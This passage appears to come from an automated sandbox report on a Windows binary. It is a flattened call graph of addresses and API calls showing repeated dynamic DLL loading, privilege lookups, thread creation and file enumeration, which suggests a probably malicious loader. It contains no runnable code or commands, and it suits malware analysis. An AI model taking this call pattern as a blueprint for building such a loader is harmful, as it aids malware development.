31923->31894 31925 2a67da1 31924->31925 31926 2a67430 10 API calls 31925->31926 31930 2a67db7 31926->31930 31927 2a67dc0 31927->31880 31928 2a67df7 31929 2a6e370 2 API calls 31928->31929 31931 2a67e08 31929->31931 31930->31927 31930->31928 31932 2a67e43 31930->31932 31931->31880 31933 2a6e370 2 API calls 31932->31933 31934 2a67e48 31933->31934 31934->31880 31936 2a6d244 31935->31936 31937 2a6d0c0 LdrLoadDll 31935->31937 32035 2a6d0c0 31936->32035 31937->31936 31939 2a6d24d 31940 2a6d0c0 LdrLoadDll 31939->31940 31941 2a6d256 31940->31941 31942 2a6d0c0 LdrLoadDll 31941->31942 31943 2a6d25f 31942->31943 31944 2a6d0c0 LdrLoadDll 31943->31944 31945 2a6d268 31944->31945 31946 2a6d0c0 LdrLoadDll 31945->31946 31947 2a6d271 31946->31947 31948 2a6d0c0 LdrLoadDll 31947->31948 31949 2a6d27d 31948->31949 31950 2a6d0c0 LdrLoadDll 31949->31950 31951 2a6d286 31950->31951 31952 2a6d0c0 LdrLoadDll 31951->31952 31953 2a6d28f 31952->31953 31954 2a6d0c0 LdrLoadDll 31953->31954 31955 2a6d298 31954->31955 31956 2a6d0c0 LdrLoadDll 31955->31956 31957 2a6d2a1 31956->31957 31958 2a6d0c0 LdrLoadDll 31957->31958 31959 2a6d2aa 31958->31959 31960 2a6d0c0 LdrLoadDll 31959->31960 31961 2a6d2b6 31960->31961 31962 2a6d0c0 LdrLoadDll 31961->31962 31963 2a6d2bf 31962->31963 31964 2a6d0c0 LdrLoadDll 31963->31964 31965 2a6d2c8 31964->31965 31966 2a6d0c0 LdrLoadDll 31965->31966 31967 2a6d2d1 31966->31967 31968 2a6d0c0 LdrLoadDll 31967->31968 31969 2a6d2da 31968->31969 31970 2a6d0c0 LdrLoadDll 31969->31970 31971 2a6d2e3 31970->31971 31972 2a6d0c0 LdrLoadDll 31971->31972 31973 2a6d2ef 31972->31973 31974 2a6d0c0 LdrLoadDll 31973->31974 31975 2a6d2f8 31974->31975 31976 2a6d0c0 LdrLoadDll 31975->31976 31977 2a6d301 31976->31977 31978 2a6d0c0 LdrLoadDll 31977->31978 31979 2a6d30a 31978->31979 31980 2a6d0c0 LdrLoadDll 31979->31980 31981 2a6d313 31980->31981 31982 2a6d0c0 LdrLoadDll 31981->31982 31983 2a6d31c 31982->31983 31984 2a6d0c0 LdrLoadDll 31983->31984 31985 2a6d328 31984->31985 31986 2a6d0c0 LdrLoadDll 31985->31986 31987 2a6d331 31986->31987 31988 2a6d0c0 LdrLoadDll 31987->31988 31989 2a6d33a 31988->31989 31990 2a6d0c0 LdrLoadDll 31989->31990 31991 2a6d343 31990->31991 31992 2a6d0c0 LdrLoadDll 31991->31992 31993 2a6d34c 31992->31993 31994 2a6d0c0 LdrLoadDll 31993->31994 31995 2a6d355 31994->31995 31996 2a6d0c0 LdrLoadDll 31995->31996 31997 2a6d361 31996->31997 31998 2a6d0c0 LdrLoadDll 31997->31998 31999 2a6d36a 31998->31999 32000 2a6d0c0 LdrLoadDll 31999->32000 32001 2a6d373 32000->32001 32002 2a6d0c0 LdrLoadDll 32001->32002 32003 2a6d37c 32002->32003 32004 2a6d0c0 LdrLoadDll 32003->32004 32005 2a6d385 32004->32005 32006 2a6d0c0 LdrLoadDll 32005->32006 32007 2a6d38e 32006->32007 32008 2a6d0c0 LdrLoadDll 32007->32008 32009 2a6d39a 32008->32009 32010 2a6d0c0 LdrLoadDll 32009->32010 32011 2a6d3a3 32010->32011 32012 2a6d0c0 LdrLoadDll 32011->32012 32013 2a6d3ac 32012->32013 32013->31884 32015 2a6d440 LdrLoadDll 32014->32015 32016 2a6c34c 32015->32016 32041 4449860 LdrInitializeThunk 32016->32041 32017 2a6c363 32017->31886 32019->31881 32021 2a6f506 32020->32021 32022 2a6f500 32020->32022 32023 2a6e450 2 API calls 32021->32023 32022->31897 32024 2a6f52c 32023->32024 32024->31897 32026 2a6f590 32025->32026 32027 2a6e450 2 API calls 32026->32027 32028 2a6f5ed 32026->32028 32029 2a6f5ca 32027->32029 32028->31905 32030 2a6e370 2 API calls 32029->32030 32030->32028 32032 2a6e370 2 API calls 32031->32032 32033 2a66cf4 32032->32033 32033->31916 32034->31901 32036 2a6d0db 32035->32036 32037 2a67840 LdrLoadDll 32036->32037 32038 2a6d0fb 32037->32038 32039 2a67840 LdrLoadDll 32038->32039 32040 2a6d1af 32038->32040 32039->32040 32040->31939 32040->32040 32041->32017 32043 4449681 32042->32043 32044 444968f LdrInitializeThunk 32042->32044 32043->31890 32044->31890 32046 2a57680 32045->32046 32047 2a5767b 32045->32047 32048 2a6e2f0 2 API calls 32046->32048 32047->31862 32054 2a576a5 32048->32054 32049 2a57708 32049->31862 32050 2a6c330 2 API calls 32050->32054 32051 2a5770e 32053 2a57734 32051->32053 32055 2a6ca30 2 API calls 32051->32055 32053->31862 32054->32049 32054->32050 32054->32051 32056 2a6e2f0 2 API calls 32054->32056 32061 2a6ca30 32054->32061 32057 2a57725 32055->32057 32056->32054 32057->31862 32059 2a5794e 32058->32059 32060 2a6ca30 2 API calls 32058->32060 32059->31823 32060->32059 32062 2a6d440 LdrLoadDll 32061->32062 32063 2a6ca4c 32062->32063 32066 44496e0 LdrInitializeThunk 32063->32066 32064 2a6ca63 32064->32054 32066->32064 32068 2a6dad3 32067->32068 32069 2a5b160 LdrLoadDll 32068->32069 32070 2a59ffd 32069->32070 32070->31829 32072 2a5b4d3 32071->32072 32074 2a5b550 32072->32074 32085 2a6c100 LdrLoadDll 32072->32085 32074->31836 32076 2a6cc46 32075->32076 32077 2a6d440 LdrLoadDll 32076->32077 32078 2a6cc5f LookupPrivilegeValueW 32077->32078 32079 2a5e132 32078->32079 32079->31843 32080 2a6c6d0 32079->32080 32081 2a6c6ec 32080->32081 32082 2a6d440 LdrLoadDll 32080->32082 32086 4449910 LdrInitializeThunk 32081->32086 32082->32081 32083 2a6c70b 32083->31843 32085->32074 32086->32083 32088 2a5b657 32087->32088 32089 2a5b4b0 LdrLoadDll 32088->32089 32090 2a5b6ba 32089->32090 32090->31782 32092 2a5b3a4 32091->32092 32137 2a6c100 LdrLoadDll 32092->32137 32094 2a5b3de 32094->31784 32096 2a5e34c 32095->32096 32097 2a5b630 LdrLoadDll 32096->32097 32098 2a5e35e 32097->32098 32138 2a5e1f0 32098->32138 32101 2a5e391 32104 2a5e3a2 32101->32104 32106 2a6c900 2 API calls 32101->32106 32102 2a5e379 32103 2a5e384 32102->32103 32105 2a6c900 2 API calls 32102->32105 32103->31788 32104->31788 32105->32103 32106->32104 32108 2a5c8b6 32107->32108 32109 2a5c8c0 32107->32109 32108->31797 32110 2a5b4b0 LdrLoadDll 32109->32110 32111 2a5c931 32110->32111 32112 2a5b380 LdrLoadDll 32111->32112 32113 2a5c945 32112->32113 32114 2a5c968 32113->32114 32115 2a5b4b0 LdrLoadDll 32113->32115 32114->31797 32116 2a5c984 32115->32116 32117 2a67430 10 API calls 32116->32117 32118 2a5c9d9 32117->32118 32118->31797 32157 2a5e5e0 32119->32157 32121 2a590f1 32121->31786 32122 2a58d9a 32122->32121 32163 2a66d60 32122->32163 32124 2a6f4f0 2 API calls 32125 2a58f92 32124->32125 32127 2a6f620 3 API calls 32125->32127 32126 2a58df6 32126->32121 32126->32124 32132 2a58fa7 32127->32132 32128 2a57670 4 API calls 32128->32132 32132->32121 32132->32128 32133 2a57930 2 API calls 32132->32133 32166 2a5c5e0 32132->32166 32216 2a5e580 32132->32216 32220 2a5dfe0 32132->32220 32133->32132 32134->31792 32135->31802 32136->31810 32137->32094 32139 2a5e2c0 32138->32139 32140 2a5e20a 32138->32140 32139->32101 32139->32102 32141 2a5b4b0 LdrLoadDll 32140->32141 32142 2a5e22c 32141->32142 32148 2a6c3b0 32142->32148 32144 2a5e26e 32151 2a6c3f0 32144->32151 32147 2a6c900 2 API calls 32147->32139 32149 2a6d440 LdrLoadDll 32148->32149 32150 2a6c3cc 32148->32150 32149->32150 32150->32144 32152 2a6c40c 32151->32152 32153 2a6d440 LdrLoadDll 32151->32153 32156 4449fe0 LdrInitializeThunk 32152->32156 32153->32152 32154 2a5e2b4 32154->32147 32156->32154 32158 2a5e5ed 32157->32158 32159 2a67840 LdrLoadDll 32158->32159 32160 2a5e605 32159->32160 32161 2a5e613 32160->32161 32162 2a5e60c SetErrorMode 32160->32162 32161->32122 32162->32161 32234 2a5e3b0 32163->32234 32165 2a66d86 32165->32126 32167 2a5c5ff 32166->32167 32168 2a5c5f9 32166->32168 32260 2a59bd0 32167->32260 32253 2a5dcb0 32168->32253 32171 2a5c60c 32172 2a5c88b 32171->32172 32173 2a6f620 3 API calls 32171->32173 32172->32132 32174 2a5c628 32173->32174 32175 2a5c63c 32174->32175 32176 2a5e580 2 API calls 32174->32176 32269 2a6c180 32175->32269 32176->32175 32179 2a5c766 32276 2a5c580 LdrLoadDll LdrInitializeThunk 32179->32276 32180 2a6c370 2 API calls 32181 2a5c6ba 32180->32181 32181->32179 32185 2a5c6c6 32181->32185 32183 2a5c785 32184 2a5c78d 32183->32184 32277 2a5c4f0 LdrLoadDll NtClose LdrInitializeThunk 32183->32277 32187 2a6c900 2 API calls 32184->32187 32185->32172 32186 2a5c70f 32185->32186 32189 2a6c480 2 API calls 32185->32189 32191 2a6c900 2 API calls 32186->32191 32190 2a5c797 32187->32190 32189->32186 32190->32132 32194 2a5c72c 32191->32194 32192 2a5c7af 32192->32184 32193 2a5c7b6 32192->32193 32196 2a5c7ce 32193->32196 32278 2a5c470 LdrLoadDll LdrInitializeThunk 32193->32278 32272 2a6b7e0 32194->32272 32279 2a6c200 LdrLoadDll 32196->32279 32197 2a5c743 32197->32172 32275 2a57ae0 LdrLoadDll 32197->32275 32200 2a5c7e2 32280 2a5c2d0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32200->32280 32203 2a5c75c 32203->32132 32204 2a5c806 32205 2a5c847 32204->32205 32281 2a6c230 LdrLoadDll 32204->32281 32283 2a6c290 LdrLoadDll 32205->32283 32208 2a5c855 32210 2a6c900 2 API calls 32208->32210 32209 2a5c824 32209->32205 32282 2a6c2c0 LdrLoadDll 32209->32282 32211 2a5c85f 32210->32211 32212 2a6c900 2 API calls 32211->32212 32214 2a5c869 32212->32214 32214->32172 32284 2a57ae0 LdrLoadDll 32214->32284 32217 2a5e593 32216->32217 32305 2a6c300 32217->32305 32221 2a5dff7 32220->32221 32222 2a5e017 32220->32222 32221->32222 32311 2a5ddf0 32221->32311 32227 2a5e056 32222->32227 32331 2a5dc30 32222->32331 32226 2a5e085 32228 2a5e0ab 32226->32228 32354 2a6af30 12 API calls 32226->32354 32227->32226 32353 2a5d5e0 12 API calls 32227->32353 32228->32132 32233 2a67430 10 API calls 32233->32227 32235 2a5e3cd 32234->32235 32241 2a6c430 32235->32241 32238 2a5e415 32238->32165 32242 2a6c44c 32241->32242 32243 2a6d440 LdrLoadDll 32241->32243 32251 44499a0 LdrInitializeThunk 32242->32251 32243->32242 32244 2a5e40e 32244->32238 32246 2a6c480 32244->32246 32247 2a6d440 LdrLoadDll 32246->32247 32248 2a6c49c 32247->32248 32252 4449780 LdrInitializeThunk 32248->32252 32249 2a5e43e 32249->32165 32251->32244 32252->32249 32285 2a5d660 32253->32285 32255 2a5ddd2 32256 2a6e450 2 API calls 32255->32256 32257 2a5dde1 32256->32257 32257->32167 32259 2a5dcce 32259->32255 32294 2a6b660 32259->32294 32262 2a59beb 32260->32262 32261 2a59d0b 32261->32171 32262->32261 32263 2a5e1f0 3 API calls 32262->32263 32264 2a59cec 32263->32264 32265 2a59d1a 32264->32265 32266 2a59d01 32264->32266 32267 2a6c900 2 API calls 32264->32267 32265->32171 32304 2a56ca0 LdrLoadDll 32266->32304 32267->32266 32270 2a6d440 LdrLoadDll 32269->32270 32271 2a5c690 32270->32271 32271->32172 32271->32179 32271->32180 32273 2a5e580 2 API calls 32272->32273 32274 2a6b812 32273->32274 32274->32197 32275->32203 32276->32183 32277->32192 32278->32196 32279->32200 32280->32204 32281->32209 32282->32205 32283->32208 32284->32172 32286 2a5d693 32285->32286 32300 2a5b7a0 32286->32300 32288 2a5d6a5 32289 2a5e3b0 3 API calls 32288->32289 32290 2a5d6e8 32289->32290 32291 2a5d6ef 32290->32291 32292 2a6e490 2 API calls 32290->32292 32291->32259 32293 2a5d6ff 32292->32293 32293->32259 32295 2a6b664 32294->32295 32296 2a67840 LdrLoadDll 32295->32296 32297 2a6b687 32296->32297 32298 2a6b6ad 32297->32298 32299 2a6b69a CreateThread 32297->32299 32298->32255 32299->32255 32301 2a5b7c7 32300->32301 32302 2a5b4b0 LdrLoadDll 32301->32302 32303 2a5b803 32302->32303 32303->32288 32304->32261 32306 2a6d440 LdrLoadDll 32305->32306 32307 2a6c31c 32306->32307 32310 4449840 LdrInitializeThunk 32307->32310 32308 2a5e5be 32308->32132 32310->32308 32312 2a5de20 32311->32312 32355 2a66750 32312->32355 32314 2a5de71 32384 2a655c0 32314->32384 32316 2a5de77 32418 2a623b0 32316->32418 32318 2a5de7d 32449 2a64620 32318->32449 32324 2a5de91 32493 2a65e60 32324->32493 32326 2a5de97 32517 2a5fcf0 32326->32517 32328 2a5deaf 32532 2a60f90 32328->32532 32332 2a5dc9f 32331->32332 32333 2a5dc48 32331->32333 32332->32228 32337 2a5da70 32332->32337 32333->32332 32334 2a611d0 10 API calls 32333->32334 32335 2a5dc89 32334->32335 32335->32332 32808 2a61420 12 API calls 32335->32808 32338 2a5da8c 32337->32338 32352 2a5db6b 32337->32352 32341 2a6c900 2 API calls 32338->32341 32338->32352 32339 2a5dbfb 32340 2a5dc15 32339->32340 32342 2a67430 10 API calls 32339->32342 32340->32227 32340->32233 32343 2a5daa7 32341->32343 32342->32340 32809 2a5cf60 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32343->32809 32345 2a5dbd8 32345->32339 32811 2a5d130 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32345->32811 32347 2a5dadf 32348 2a5b4b0 LdrLoadDll 32347->32348 32350 2a5daf0 32348->32350 32351 2a5b4b0 LdrLoadDll 32350->32351 32351->32352 32352->32339 32810 2a5cf60 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32352->32810 32353->32226 32354->32228 32356 2a66778 32355->32356 32357 2a5b4b0 LdrLoadDll 32356->32357 32358 2a6678c 32357->32358 32359 2a5cd20 3 API calls 32358->32359 32361 2a667bf 32359->32361 32360 2a667c6 32360->32314 32361->32360 32362 2a5b4b0 LdrLoadDll 32361->32362 32363 2a667ee 32362->32363 32364 2a5b4b0 LdrLoadDll 32363->32364 32365 2a66812 32364->32365 32537 2a5cde0 32365->32537 32367 2a66878 32369 2a5b4b0 LdrLoadDll 32367->32369 32368 2a66836 32368->32367 32381 2a669fb 32368->32381 32541 2a664a0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 32368->32541 32370 2a66898 32369->32370 32372 2a5cde0 2 API calls 32370->32372 32375 2a668bc 32372->32375 32373 2a66902 32374 2a5cde0 2 API calls 32373->32374 32378 2a66932 32374->32378 32375->32373 32375->32381 32542 2a664a0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 32375->32542 32377 2a66978 32380 2a5cde0 2 API calls 32377->32380 32378->32377 32378->32381 32543 2a664a0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 32378->32543 32382 2a669d7 32380->32382 32381->32314 32382->32381 32544 2a664a0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 32382->32544 32385 2a65624 32384->32385 32386 2a5b4b0 LdrLoadDll 32385->32386 32387 2a656f1 32386->32387 32388 2a5cd20 3 API calls 32387->32388 32390 2a65724 32388->32390 32389 2a6572b 32389->32316 32390->32389 32391 2a5b4b0 LdrLoadDll 32390->32391 32392 2a65753 32391->32392 32393 2a5cde0 2 API calls 32392->32393 32395 2a65793 32393->32395 32394 2a658b3 32394->32316 32395->32394 32396 2a658c2 32395->32396 32551 2a653b0 32395->32551 32397 2a6c900 2 API calls 32396->32397 32399 2a658cc 32397->32399 32399->32316 32400 2a657c8 32400->32396 32401 2a657d3 32400->32401 32402 2a6e450 2 API calls 32401->32402 32403 2a657fc 32402->32403 32404 2a65805 32403->32404 32405 2a6581b 32403->32405 32406 2a6c900 2 API calls 32404->32406 32580 2a652a0 CoInitialize 32405->32580 32408 2a6580f 32406->32408 32408->32316 32409 2a65829 32582 2a6c610 32409->32582 32411 2a658a2 32412 2a6c900 2 API calls 32411->32412 32413 2a658ac 32412->32413 32415 2a6e370 2 API calls 32413->32415 32415->32394 32416 2a65847 32416->32411 32417 2a6c610 2 API calls 32416->32417 32587 2a651d0 LdrLoadDll RtlFreeHeap 32416->32587 32417->32416 32419 2a623d8 32418->32419 32420 2a6e450 2 API calls 32419->32420 32422 2a62438 32420->32422 32421 2a62441 32421->32318 32422->32421 32589 2a61810 32422->32589 32424 2a6246a 32425 2a6248a 32424->32425 32619 2a61b20 LdrLoadDll 32424->32619 32426 2a624a8 32425->32426 32621 2a64120 12 API calls 32425->32621 32434 2a624c2 32426->32434 32623 2a5b2b0 LdrLoadDll 32426->32623 32429 2a62478 32429->32425 32620 2a62130 10 API calls 32429->32620 32430 2a6249c 32622 2a64120 12 API calls 32430->32622 32435 2a61810 12 API calls 32434->32435 32436 2a624ef 32435->32436 32437 2a62510 32436->32437 32624 2a61b20 LdrLoadDll 32436->32624 32439 2a6252e 32437->32439 32626 2a64120 12 API calls 32437->32626 32440 2a62548 32439->32440 32628 2a5b2b0 LdrLoadDll 32439->32628 32444 2a6e370 2 API calls 32440->32444 32441 2a624fe 32441->32437 32625 2a62130 10 API calls 32441->32625 32446 2a62552 32444->32446 32445 2a62522 32627 2a64120 12 API calls 32445->32627 32446->32318 32450 2a64646 32449->32450 32451 2a5b4b0 LdrLoadDll 32450->32451 32452 2a64675 32451->32452 32453 2a5b4b0 LdrLoadDll 32452->32453 32454 2a646a1 32452->32454 32453->32454 32648 2a5e7e0 32454->32648 32456 2a5de85 32459 2a658e0 32456->32459 32457 2a64785 32457->32456 32653 2a64330 32457->32653 32460 2a64620 12 API calls 32459->32460 32461 2a5de8b 32460->32461 32462 2a63340 32461->32462 32463 2a63362 32462->32463 32464 2a5b4b0 LdrLoadDll 32463->32464 32465 2a6352d 32464->32465 32466 2a5b4b0 LdrLoadDll 32465->32466 32467 2a6353e 32466->32467 32468 2a5b380 LdrLoadDll 32467->32468 32469 2a63555 32468->32469 32733 2a63200 32469->32733 32472 2a63200 13 API calls 32473 2a635cb 32472->32473 32474 2a63200 13 API calls 32473->32474 32475 2a635e3 32474->32475 32476 2a63200 13 API calls 32475->32476 32477 2a635fb 32476->32477 32478 2a63200 13 API calls 32477->32478 32479 2a63613 32478->32479 32480 2a63200 13 API calls 32479->32480 32481 2a6362e 32480->32481 32482 2a63648 32481->32482 32483 2a63200 13 API calls 32481->32483 32482->32324 32484 2a6367c 32483->32484 32485 2a63200 13 API calls 32484->32485 32486 2a636b9 32485->32486 32487 2a63200 13 API calls 32486->32487 32488 2a636f6 32487->32488 32489 2a63200 13 API calls 32488->32489 32490 2a63733 32489->32490 32491 2a63200 13 API calls 32490->32491 32492 2a63770 32491->32492 32492->32324 32494 2a65e7d 32493->32494 32495 2a5b160 LdrLoadDll 32494->32495 32496 2a65e98 32495->32496 32497 2a67840 LdrLoadDll 32496->32497 32514 2a6609c 32496->32514 32498 2a65ec8 32497->32498 32499 2a67840 LdrLoadDll 32498->32499 32500 2a65ee1 32499->32500 32501 2a67840 LdrLoadDll 32500->32501 32502 2a65efa 32501->32502 32503 2a67840 LdrLoadDll 32502->32503 32504 2a65f16 32503->32504 32505 2a67840 LdrLoadDll 32504->32505 32506 2a65f2f 32505->32506 32507 2a67840 LdrLoadDll 32506->32507 32508 2a65f48 32507->32508 32509 2a67840 LdrLoadDll 32508->32509 32510 2a65f64 32509->32510 32511 2a67840 LdrLoadDll 32510->32511 32512 2a65f7d 32511->32512 32513 2a67840 LdrLoadDll 32512->32513 32515 2a65f95 32513->32515 32514->32326 32515->32514 32748 2a65a20 LdrLoadDll 32515->32748 32518 2a5fd06 32517->32518 32528 2a5fd11 32517->32528 32519 2a6e450 2 API calls 32518->32519 32519->32528 32520 2a5fd27 32520->32328 32521 2a67840 LdrLoadDll 32521->32528 32522 2a5fe0c GetFileAttributesW 32522->32528 32523 2a5ff8f 32524 2a5ffa8 32523->32524 32525 2a6e370 2 API calls 32523->32525 32524->32328 32525->32524 32527 2a5b4b0 LdrLoadDll 32527->32528 32528->32520 32528->32521 32528->32522 32528->32523 32528->32527 32529 2a63780 10 API calls 32528->32529 32749 2a6ab20 32528->32749 32753 2a6a9b0 11 API calls 32528->32753 32754 2a6a850 11 API calls 32528->32754 32529->32528 32755 2a60d10 32532->32755 32534 2a60f9d 32776 2a609f0 32534->32776 32536 2a5dec1 32536->32222 32538 2a5ce05 32537->32538 32545 2a6c500 32538->32545 32541->32367 32542->32373 32543->32377 32544->32381 32546 2a6d440 LdrLoadDll 32545->32546 32547 2a6c51c 32546->32547 32550 44496d0 LdrInitializeThunk 32547->32550 32548 2a5ce79 32548->32368 32550->32548 32552 2a653cc 32551->32552 32553 2a5b160 LdrLoadDll 32552->32553 32555 2a653e7 32553->32555 32554 2a653f0 32554->32400 32555->32554 32556 2a67840 LdrLoadDll 32555->32556 32557 2a6540d 32556->32557 32558 2a67840 LdrLoadDll 32557->32558 32559 2a65428 32558->32559 32560 2a67840 LdrLoadDll 32559->32560 32561 2a65441 32560->32561 32562 2a67840 LdrLoadDll 32561->32562 32563 2a6545d 32562->32563 32564 2a67840 LdrLoadDll 32563->32564 32565 2a65476 32564->32565 32566 2a67840 LdrLoadDll 32565->32566 32567 2a6548f 32566->32567 32568 2a5b160 LdrLoadDll 32567->32568 32570 2a654bb 32568->32570 32569 2a65569 32569->32400 32570->32569 32571 2a67840 LdrLoadDll 32570->32571 32572 2a654df 32571->32572 32573 2a5b160 LdrLoadDll 32572->32573 32574 2a65514 32573->32574 32574->32569 32575 2a67840 LdrLoadDll 32574->32575 32576 2a65537 32575->32576 32577 2a67840 LdrLoadDll 32576->32577 32578 2a65550 32577->32578 32579 2a67840 LdrLoadDll 32578->32579 32579->32569 32581 2a65305 32580->32581 32581->32409 32583 2a6d440 LdrLoadDll 32582->32583 32584 2a6c62c 32583->32584 32588 4449610 LdrInitializeThunk 32584->32588 32585 2a6c64b 32585->32416 32587->32416 32588->32585 32590 2a618a8 32589->32590 32591 2a5b4b0 LdrLoadDll 32590->32591 32592 2a61946 32591->32592 32593 2a5b4b0 LdrLoadDll 32592->32593 32594 2a61961 32593->32594 32595 2a5cde0 2 API calls 32594->32595 32596 2a61986 32595->32596 32597 2a61acd 32596->32597 32641 2a6c590 32596->32641 32601 2a61ade 32597->32601 32629 2a611d0 32597->32629 32601->32424 32602 2a61ac3 32603 2a6c900 2 API calls 32602->32603 32603->32597 32604 2a619bf 32605 2a6c900 2 API calls 32604->32605 32606 2a619f9 32605->32606 32646 2a6e530 LdrLoadDll 32606->32646 32608 2a61a2f 32608->32601 32609 2a5cde0 2 API calls 32608->32609 32610 2a61a55 32609->32610 32610->32601 32611 2a6c590 2 API calls 32610->32611 32612 2a61a7a 32611->32612 32613 2a61a81 32612->32613 32614 2a61aad 32612->32614 32616 2a6c900 2 API calls 32613->32616 32615 2a6c900 2 API calls 32614->32615 32617 2a61ab7 32615->32617 32618 2a61a8b 32616->32618 32617->32424 32618->32424 32619->32429 32620->32425 32621->32430 32622->32426 32623->32434 32624->32441 32625->32437 32626->32445 32627->32439 32628->32440 32630 2a611f5 32629->32630 32631 2a5b4b0 LdrLoadDll 32630->32631 32632 2a612b0 32631->32632 32633 2a5b4b0 LdrLoadDll 32632->32633 32634 2a612d4 32633->32634 32635 2a67430 10 API calls 32634->32635 32636 2a61327 32635->32636 32637 2a5b4b0 LdrLoadDll 32636->32637 32640 2a613e1 32636->32640 32638 2a6138e 32637->32638 32639 2a67430 10 API calls 32638->32639 32639->32640 32640->32601 32642 2a6d440 LdrLoadDll 32641->32642 32643 2a6c5ac 32642->32643 32647 4449650 LdrInitializeThunk 32643->32647 32644 2a619b4 32644->32602 32644->32604 32646->32608 32647->32644 32649 2a67840 LdrLoadDll 32648->32649 32650 2a5e7ff GetFileAttributesW 32649->32650 32652 2a5e811 32650->32652 32652->32457 32656 2a64346 32653->32656 32677 2a6ac80 32653->32677 32655 2a6439b 32655->32457 32656->32655 32657 2a643a7 32656->32657 32658 2a64365 32656->32658 32661 2a5b4b0 LdrLoadDll 32657->32661 32659 2a6436d 32658->32659 32660 2a6438a 32658->32660 32662 2a6e370 2 API calls 32659->32662 32663 2a6e370 2 API calls 32660->32663 32664 2a643b8 32661->32664 32665 2a6437e 32662->32665 32663->32655 32666 2a67430 10 API calls 32664->32666 32665->32457 32667 2a643cf 32666->32667 32717 2a63780 32667->32717 32669 2a643da 32673 2a644d8 32669->32673 32674 2a643f2 32669->32674 32670 2a644bf 32671 2a6e370 2 API calls 32670->32671 32672 2a645e3 32671->32672 32672->32457 32673->32670 32728 2a63d10 11 API calls 32673->32728 32674->32670 32727 2a63d10 11 API calls 32674->32727 32678 2a6ac8e 32677->32678 32679 2a6ac95 32677->32679 32678->32656 32680 2a5b160 LdrLoadDll 32679->32680 32681 2a6acc7 32680->32681 32682 2a6acd6 32681->32682 32729 2a6a770 LdrLoadDll 32681->32729 32684 2a6e450 2 API calls 32682->32684 32686 2a6aeb9 32682->32686 32685 2a6acef 32684->32685 32685->32686 32687 2a6ad04 32685->32687 32688 2a6ae68 32685->32688 32686->32656 32730 2a63860 LdrLoadDll 32687->32730 32689 2a6ae72 32688->32689 32690 2a6af0b 32688->32690 32731 2a63860 LdrLoadDll 32689->32731 32693 2a6e370 2 API calls 32690->32693 32693->32686 32694 2a6ad1b 32698 2a67840 LdrLoadDll 32694->32698 32695 2a6ae89 32732 2a6a0a0 LdrLoadDll 32695->32732 32697 2a6ae9f 32700 2a67840 LdrLoadDll 32697->32700 32699 2a6ad37 32698->32699 32701 2a67840 LdrLoadDll 32699->32701 32700->32686 32702 2a6ad53 32701->32702 32703 2a67840 LdrLoadDll 32702->32703 32704 2a6ad72 32703->32704 32705 2a67840 LdrLoadDll 32704->32705 32706 2a6ad8e 32705->32706 32707 2a67840 LdrLoadDll 32706->32707 32708 2a6adaa 32707->32708 32709 2a67840 LdrLoadDll 32708->32709 32710 2a6adc9 32709->32710 32711 2a67840 LdrLoadDll 32710->32711 32712 2a6ade5 32711->32712 32713 2a67840 LdrLoadDll 32712->32713 32714 2a6ae08 32713->32714 32714->32686 32715 2a6e370 2 API calls 32714->32715 32716 2a6ae5c 32715->32716 32716->32656 32718 2a67430 10 API calls 32717->32718 32719 2a63796 32718->32719 32720 2a637a3 32719->32720 32721 2a67430 10 API calls 32719->32721 32720->32669 32722 2a637b4 32721->32722 32722->32720 32723 2a67430 10 API calls 32722->32723 32724 2a637cf 32723->32724 32725 2a6e370 2 API calls 32724->32725 32726 2a637dc 32725->32726 32726->32669 32727->32674 32728->32673 32729->32682 32730->32694 32731->32695 32732->32697 32734 2a63229 32733->32734 32735 2a67840 LdrLoadDll 32734->32735 32736 2a63266 32735->32736 32737 2a67840 LdrLoadDll 32736->32737 32738 2a63284 32737->32738 32739 2a67840 LdrLoadDll 32738->32739 32741 2a632a6 32739->32741 32740 2a6332c 32740->32472 32741->32740 32742 2a632d0 FindFirstFileW 32741->32742 32742->32740 32746 2a632eb 32742->32746 32743 2a63313 FindNextFileW 32744 2a63325 FindClose 32743->32744 32743->32746 32744->32740 32746->32743 32747 2a630e0 13 API calls 32746->32747 32747->32746 32748->32515 32750 2a6ab36 32749->32750 32752 2a6ac36 32749->32752 32751 2a67430 10 API calls 32750->32751 32750->32752 32751->32750 32752->32528 32753->32528 32754->32528 32756 2a60d35 32755->32756 32757 2a5b4b0 LdrLoadDll 32756->32757 32758 2a60d9a 32757->32758 32759 2a5b4b0 LdrLoadDll 32758->32759 32760 2a60de8 32759->32760 32761 2a5e7e0 2 API calls 32760->32761 32762 2a60e2f 32761->32762 32763 2a60e36 32762->32763 32764 2a6ac80 3 API calls 32762->32764 32763->32534 32765 2a60e44 32764->32765 32766 2a60e4d 32765->32766 32767 2a5b4b0 LdrLoadDll 32765->32767 32766->32534 32769 2a60e9c 32767->32769 32768 2a6ab20 10 API calls 32768->32769 32769->32768 32771 2a60f21 32769->32771 32789 2a60450 32769->32789 32773 2a60f79 32771->32773 32800 2a607b0 32771->32800 32774 2a6e370 2 API calls 32773->32774 32775 2a60f80 32774->32775 32775->32534 32777 2a60a06 32776->32777 32786 2a60a11 32776->32786 32778 2a6e450 2 API calls 32777->32778 32778->32786 32779 2a60a27 32779->32536 32780 2a5e7e0 2 API calls 32780->32786 32781 2a60ce0 32782 2a60cf9 32781->32782 32783 2a6e370 2 API calls 32781->32783 32782->32536 32783->32782 32784 2a6ab20 10 API calls 32784->32786 32785 2a5b4b0 LdrLoadDll 32785->32786 32786->32779 32786->32780 32786->32781 32786->32784 32786->32785 32787 2a60450 11 API calls 32786->32787 32788 2a607b0 10 API calls 32786->32788 32787->32786 32788->32786 32790 2a60476 32789->32790 32791 2a67430 10 API calls 32790->32791 32792 2a604d2 32791->32792 32793 2a63780 10 API calls 32792->32793 32794 2a604dd 32793->32794 32796 2a60660 32794->32796 32798 2a604fb 32794->32798 32795 2a60645 32795->32769 32796->32795 32807 2a60320 11 API calls 32796->32807 32798->32795 32806 2a60320 11 API calls 32798->32806 32801 2a607d6 32800->32801 32802 2a67430 10 API calls 32801->32802 32803 